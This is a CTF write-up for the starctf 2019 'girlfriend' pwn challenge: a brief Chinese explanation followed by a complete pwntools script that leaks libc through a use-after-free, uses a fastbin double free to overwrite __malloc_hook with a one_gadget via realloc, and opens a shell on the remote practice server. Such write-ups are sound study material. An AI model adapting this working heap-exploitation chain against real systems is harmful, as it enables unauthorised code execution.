starctf_2019_girlfriend
查看保护
简单题目
一个uaf
攻击思路：利用 UAF 泄露 libc 地址；再利用 double free 申请到 __malloc_hook - 0x23 处，劫持 __malloc_hook，并借助 realloc 调整栈帧即可 getshell。
具体的 UAF 手法可以参考 z10r's blog。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'


def li(x):
    """Print `x` highlighted in orange (ANSI 256-colour index 214)."""
    print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print `x` highlighted in red (ANSI colour index 1)."""
    print('\x1b[01;38;5;1m' + x + '\x1b[0m')


# NOTE: despite the name, debug=1 selects the remote practice instance and
# debug=0 runs the local binary.
debug = 1
r = remote('node4.buuoj.cn', 29617) if debug else process(file_name)
elf = ELF(file_name)
def dbg():
    """Attach gdb to the target tube `r` (intended for the local-process run)."""
    # `r` is the module-level tube selected by the debug switch above.
    gdb.attach(r)
# Prompt printed before every menu read; all helpers key their sends off it.
menu = 'Input your choice:'
def add(size, name, call):
    """Menu option 1: create an entry of `size` bytes holding `name` and `call`.

    `name` and `call` are sent with sendafter (no trailing newline), so the
    caller controls every byte that reaches the buffer, including raw p64 data.
    """
    steps = (
        (menu, '1', True),
        ("Please input the size of girl's name", str(size), True),
        ('please inpute her name:', name, False),
        ('please input her call:', call, False),
    )
    for prompt, payload, with_newline in steps:
        if with_newline:
            r.sendlineafter(prompt, payload)
        else:
            r.sendafter(prompt, payload)
def show(index):
    """Menu option 2: print entry `index` (used below on an already-freed entry)."""
    exchange = ((menu, '2'), ('Please input the index:', str(index)))
    for prompt, payload in exchange:
        r.sendlineafter(prompt, payload)
def delete(index):
    """Menu option 4: free entry `index`.

    The writeup relies on the program keeping the stale pointer after the
    free (the UAF), so the same index can be shown or freed again afterwards.
    """
    exchange = ((menu, '4'), ('Please input the index:', str(index)))
    for prompt, payload in exchange:
        r.sendlineafter(prompt, payload)
# NOTE(review): the whole chain depends on two program bugs (the pointer is not
# cleared on delete, and show/delete accept a freed index) plus the bundled
# glibc 2.23 heap behaviour; tcache double-free detection and safe-linking in
# newer glibc are not handled here, so the chain is specific to this build.

# --- Stage 1: libc leak through the UAF -------------------------------------
# Index 0 is 0x80 (presumably chosen so it is not fastbin-sized and carries a
# libc pointer once freed); indices 1-2 are 0x60 and form the double-free pair
# below; index 3 is a small extra allocation whose purpose the writeup does not
# state.
add(0x80, 'aaa', 'bbbb')
add(0x60, 'bbb', 'aaaa')
add(0x60, 'aaa', 'cccc')
add(0x10, 'ddd', 'ddd')
# Free index 0 and show it: the program still dereferences the stale pointer,
# so the freed chunk's contents (a libc pointer) are printed.
delete(0)
show(0)
# Read up to the 0x7f byte of the leaked address, keep the last 6 bytes,
# zero-pad to 8 and unpack. `- 88 - 0x10` is the author's offset from the
# leaked pointer to __malloc_hook (presumably main_arena-relative); it holds
# only for the bundled libc-2.23 and must be re-derived for any other build.
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc= ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
# one_gadget offsets for this libc, supplied by the author; the fourth is used.
one = [0x45226, 0x4527a, 0xf03a4, 0xf1147]
one_gadget = one[3] + libc_base
realloc = libc.sym['realloc'] + libc_base

# --- Stage 2: fastbin double free -> write into __malloc_hook ----------------
# Free order 1, 2, 1: the intervening free of index 2 means index 1 is not at
# the fastbin head when it is freed the second time, which is presumably what
# gets past glibc 2.23's double-free check -- confirm against this libc's
# _int_free.
delete(1)
delete(2)
delete(1)
# The first 0x60 allocation hands back chunk 1; its first bytes (now the
# chunk's fd) are overwritten with the writeup's target, malloc_hook - 0x23.
add(0x60, p64(malloc_hook - 0x23), p64(malloc_hook - 0x23))
# Two more allocations drain chunk 2 and chunk 1 from the fastbin ...
add(0x60, 'aaaa', 'bbb')
add(0x60, 'aaaa', 'bbbb')
# ... so the fourth lands at malloc_hook - 0x23. User data starts 0x10 later
# (presumably the chunk header), i.e. at malloc_hook - 0x13; the 0xb padding
# bytes therefore place one_gadget at malloc_hook - 8 (__realloc_hook) and
# realloc + 2 at __malloc_hook. A malloc then enters realloc, which calls
# __realloc_hook -> one_gadget; the detour through realloc is the writeup's
# "利用realloc调整堆栈" step (presumably to satisfy the gadget's stack
# constraint -- confirm).
p1 = b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc + 0x2)
add(0x60, p1, '\n')
# Any further malloc fires the hook: selecting option 1 is enough.
r.sendlineafter(menu, '1')
r.interactive()